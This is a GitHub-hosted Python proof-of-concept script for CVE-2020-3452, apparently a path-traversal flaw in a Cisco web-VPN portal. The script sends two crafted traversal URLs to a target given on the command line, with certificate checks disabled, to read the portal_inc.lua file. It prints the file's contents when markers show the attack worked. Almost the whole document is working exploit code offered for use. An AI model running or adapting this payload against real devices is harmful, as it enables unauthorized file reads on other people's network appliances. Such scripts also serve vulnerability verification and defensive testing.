-
Notifications
You must be signed in to change notification settings - Fork 87
/
Copy pathCVE-2020-3452.py
30 lines (25 loc) · 1015 Bytes
/
CVE-2020-3452.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#author: myh0st@xazlsec
import requests
import random
import string
import sys
import base64
def verify(url):
poc1 = '{}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
poc2 = '{}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'
resp_poc1 = requests.get(poc1.format(url), verify=False, timeout=5)
if ('common.lua' in resp_poc1.text) or ('browser_inc.lua' in resp_poc1.text):
return resp_poc1.text
resp_poc2 = requests.get(poc2.format(url), verify=False, timeout=5)
if ('common.lua' in resp_poc2.text) or ('browser_inc.lua' in resp_poc2.text):
return resp_poc2.text
return False
if __name__=="__main__":
target = sys.argv[1]
data = verify(target)
if data:
print("[+]漏洞存在,读取 portal_inc.lua 的文件内容为:", data[:300])
else:
print("[-]漏洞不存在")